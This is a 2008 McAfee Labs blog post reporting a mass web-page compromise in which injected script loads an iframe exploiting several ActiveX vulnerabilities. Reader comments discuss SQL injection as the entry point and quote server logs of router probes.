About Me

Craig Schmugar

Craig Schmugar

Read More

Feeds & Podcasts

Blogs

Meet the Bloggers

Archive

Tags

#SecChat $1 million guarantee 12 Scams of Christmas access to live fraud resolution agents Acquisition Alex Thurber Android antivirus Apple botnet Channel Partners cloud security Compliance Consumer counter identity theft credit card fraud and protection credit fraud alerts credit monitoring credit monitoring and resolution critical infrastructure Cyber Security Mom cyberbullying Cybercrime cybermom data breach data center data center security Data Protection Dave DeWalt DLP Email & Web Security embedded encryption Endpoint Protection enterprise facebook fake anti-virus software Family Safety Friday Security Highlights global threat intelligence google government Hacktivism how to talk to kids how to talk to teens identity fraud identity fraud scams identity protection identity protection $1 million guarantee identity protection fraud identity protection surveillance identity surveillance identity theft identity theft expert identity theft fraud identity theft protection identity theft protection product Identity thieves and cybercriminals intel iphone kids online behavior lost wallet protection malware McAfee McAfee Channel McAfee Family Protection McAfee Identity Protection McAfee Initiative to Fight Cybercrime McAfee Labs McAfee security products Mid-Market Mobile mobile malware mobile security monitor credit and personal information Network Security online personal data protection online safety Operation Aurora PCI personal identity theft fraud personal information loss personal information protection phishing privacy proactive identity protection proactive identity surveillance Public Sector restore credit and personal identity Risk and Compliance scam scams scareware security smartphones social media social networking social networks spam Stuxnet twitter vulnerability Web 2.0 work with victim restore identity

McAfee Labs :

Another Mass Attack Underway

Wednesday, March 12, 2008 at 4:35pm by Craig Schmugar
Craig Schmugar

On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injection of script into valid web page to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:

  • MS06-014
  • RealPlayer (ActiveX Control)
  • Baofeng Storm (ActiveX Control)
  • Xunlei Thunder DapPlayer (ActiveX Control)
  • Ourgame GLWorld GlobalLink Chat (ActiveX Control)

This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers.

Preliminary research results suggest more than 10,000 pages were affected by this hack attack.

Similar attacks were observed in the past; most notable the infamous “Dolphin Stadium” (aka Super Bowl) attack was similar, which was later connected with SQL injection as the method used by the attackers to inject their malicious code. In cases where the TITLE tag has been modified, the browser’s title bar will show the script reference:


Example of browser title bar (censored)

McAfee’s designations for the various pieces of malware include:

  • Downloader-BGX
  • Exploit-RealPlay
  • JS/Exploit-BO.gen
  • VBS/Psyme

Analysis is ongoing.

Bookmark and Share

Submit your own comments / message for this post

Your email is never published nor shared. Required fields are marked *

 

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Comments (10)

  • Maeven March 19, 2008 12:08PM

    So, how can an ordinary user recognize if their computer is infected with this virus/trojan? Is there a file name we should be looking for in the Task Manager or elsewhere?

    Reply
  • Aa'ed Alqarta March 18, 2008 12:47PM

    System admins should be ready to prevent their clients from getting exploited and redirected to those malicious domains.

    check here: http://extremesecurity.blogspot.com/2008/03/iframe-attacks-actions-to-be-taken.html

    Reply
  • Craig Schmugar March 18, 2008 8:52AM

    Blind SQL injection was used to attack ASP applications. The vulnerability is in the coding of the applications and improper sanitization of input parameters.

    More details are available here:
    http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx

    Reply
  • eric March 17, 2008 9:06PM

    So is it a common web server software that is being hacked, apache, iss what have you?

    Reply
  • Jan de Kruyf March 15, 2008 3:17AM

    # Bas Groot Says:
    March 14th, 2008 at 12:19 am

    How did they break into the website? If it is automated, it must be a widely spread exploit that is worth reporting.
    —————————————————————-

    It is automated, it comes from europe, holland and france the last time I checked, and it is indeed aimed at certain routers. There was a general discussion about 3 years back on the net.
    From my analysis they request a specific file on this router “/cgi-bin/firmwarecfg” if they are the first running it then it leaves the whole system wide open since they have access to all info in the router or something like that. In any case complaints to my provider or the provider from whose network some of the attacks originate have not been answered whatsoever.

    Peace

    Jan de Kruyf.

    Reply
  • Craig Schmugar March 14, 2008 11:25AM

    There’s not much to see…the drive by can cause IE to hang, and the payload doesn’t display anything.

    Reply
  • curious March 14, 2008 10:28AM

    could mcafee show us a video demo of this attack in action, similar to the video for the phpBB hack?

    Thanks.

    Reply
  • Toralv Dirro March 14, 2008 4:28AM

    That is an attempt to exploit a 3 year old vulnerability found in some DSL routers if remote management is enabled and is very likely not related to the Mass Hack Attacks.

    cheers,
    Toralv

    Reply
  • Bas Groot March 14, 2008 12:19AM

    How did they break into the website? If it is automated, it must be a widely spread exploit that is worth reporting.

    Reply
  • Jan de Kruyf March 13, 2008 12:09PM

    hello,
    I do not know is this is related or known: ever few days there is an attack on my website which does not succeed since a pc in general in not vulnerable, but certain routers are.
    Here is an excerpt from my access log:
    ——————————————————————
    41.232.21.69 – - [07/Mar/2008:13:44:58 +0200] “POST /cgi-bin/firmwarecfg HTTP/1.1″ 400 431 “-” “veryprivateacsor”
    41.234.44.208 – - [07/Mar/2008:22:03:53 +0200] “POST /cgi-bin/firmwarecfg HTTP/1.1″ 400 431 “-” “veryprivateacsor”
    41.234.15.165 – - [07/Mar/2008:22:03:54 +0200] “POST /cgi-bin/firmwarecfg HTTP/1.1″ 400 431 “-” “veryprivateacsor”
    ——————————————————————-

    Here is the corresponding error log:
    ——————————————————————-
    [Fri Mar 07 13:44:58 2008] [error] [client 41.232.21.69] request failed: error reading the headers
    [Fri Mar 07 22:03:53 2008] [error] [client 41.234.44.208] request failed: error reading the headers
    [Fri Mar 07 22:03:54 2008] [error] [client 41.234.15.165] request failed: error reading the headers
    ——————————————————————-

    Complait to the service provider had no result!!

    peace,

    Jan de Kruyf.

    Reply